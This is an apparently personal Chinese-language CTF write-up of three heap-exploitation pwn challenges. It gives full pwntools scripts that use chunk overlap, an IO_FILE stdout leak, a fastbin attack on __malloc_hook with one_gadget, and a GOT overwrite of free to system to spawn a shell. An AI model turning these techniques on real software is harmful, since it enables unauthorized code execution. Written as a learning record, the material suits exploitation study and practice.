就做了一个pwn我tcl
但是收获很多
总结一下还是不够细心如果细心一点估计还能做34个tttttcl
woodenbox2
这道题有先是用chunk overlop然后将unsortbin切割到fastbin(此时unsortbin与fastbin指向了同一个堆块)通过堆溢出将低位覆盖为stdout上面的位置然后写IO_FILE结构体leaklibc基址然后通过fastbin attack打malloc_hook即可
IO_FILE结构体的知识可看一下
https://wiki.x10sec.org/pwn/io_file/exploit-in-libc2.24/
exp:
from pwn import *
p=process('./woodenbox2')
elf=ELF('./woodenbox2')
libc=elf.libc
def add(size,name):
p.sendlineafter(':','1')
p.sendlineafter(':',str(size))
p.sendafter(':',name)
def edit(idx,size,content):
p.sendlineafter(':','2')
p.sendlineafter(':',str(idx))
p.sendlineafter(':',str(size))
p.sendafter(':',content)
def delete(idx):
p.sendlineafter(':','3')
p.sendlineafter(':',str(idx))
add(0x68,'0'*0x68)
add(0x68,'1'*0x68)
add(0x68,'2'*0x68)
add(0x68,'3'*0x68)
edit(0,0x70,'0'*0x68+p64(0xe1))
delete(1)
delete(1)
add(0x38,'a'*0x38)
add(0x28,'b'*0x28)
payload='b'*0x28+p64(0x71)+'\xdd\x25'
edit(2,len(payload),payload)
add(0x68,'\x00'*0x68)
add(0x68,'\x00'*0x33+p64(0xfbad3c80)+3*p64(0)+p8(0))
libcbase=u64(p.recvuntil('\x7f')[-6:]+'\x00\x00')-libc.sym['_IO_2_1_stderr_']-192
log.success('libcbase: '+hex(libcbase))
o_g=[0x45216,0x4526a,0xf02a4,0xf1147]
one_gadget=libcbase+o_g[0]
malloc_hook=libcbase+libc.sym['__malloc_hook']
realloc=libcbase+libc.sym['__libc_realloc']
delete(3)
payload='a'*0x28+p64(0x71)+p64(malloc_hook-0x23)
edit(1,len(payload),payload)
add(0x68,'a'*0x68)
add(0x68,'a'*11+p64(one_gadget)+p64(realloc+15))
p.sendlineafter(':','1')
p.sendlineafter(':',str(size))
p.interactive()
Shortest_path
这题flag尽然读入到了堆上面直接填过去打印就行了
exp:
#!/usr/bin/python2
from pwn import *
p=process('./Shortest_path')
def add(idx,pri,size,name,num):
p.sendlineafter('> ','1')
p.sendlineafter(': ',str(idx))
p.sendlineafter(': ',str(pri))
p.sendlineafter(': ',str(size))
p.sendlineafter(':',name)
p.sendlineafter(': ',str(num))
add(0,2,0x68,'\x11'*0x38,0)
add(1,2,0x68,'\x11'*0x38,0)
add(2,2,0x68,'\x11'*0x38,0)
add(3,2,0x48,'\x11'*0x30,0)
p.sendlineafter('> ','4')
p.sendlineafter(': ',str(3))
p.sendlineafter(': ','3')
p.interactive()
easyheap
这题堆上面有指针没有清空可以使用fastbin链表的性质2次利用将freegot写成put即可泄露然后将free写成system释放拿到shell
exp:
#!/usr/bin/python2
from pwn import *
#p=process('./easyheap')
p=remote('121.36.209.145',9997)
elf=ELF('./easyheap')
#libc=ELF('./libc.so.6')
libc=elf.libc
def add(size,content):
p.sendlineafter(':','1')
p.sendlineafter('?',str(size))
p.sendafter('?',content)
def timuchadd(size):
p.sendlineafter(':','1')
p.sendlineafter('?',str(size))
def edit(idx,content):
p.sendlineafter(':','3')
p.sendlineafter('?',str(idx))
p.sendafter('?',content)
def delete(idx):
p.sendlineafter(':','2')
p.sendlineafter('?',str(idx))
add(0x68,'\x11'*4)#0
add(0x180,'\x12'*4)#1
add(0x20,'/bin/sh\x00')
delete(0)
delete(1)
timuchadd(0x100000)
timuchadd(0x100000)
edit(0,p64(0)+p64(0x21)+p64(elf.got['free'])+p64(0x1000)+p64(0)+p64(0x71)+p64(0)*13+p64(0x21)+p64(0x6020C0))
edit(0,p64(elf.got['atoi']))
edit(1,p64(elf.plt['puts']))
delete(0)
o_g=[0x45216,0x4526a,0xf02a4,0xf1147]
libcbase=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-libc.sym['atoi']
one_gadget=libcbase+o_g[3]
system=libcbase+libc.sym['system']
edit(1,p64(system))
log.success('libcbase: '+hex(libcbase))
delete(2)
p.interactive()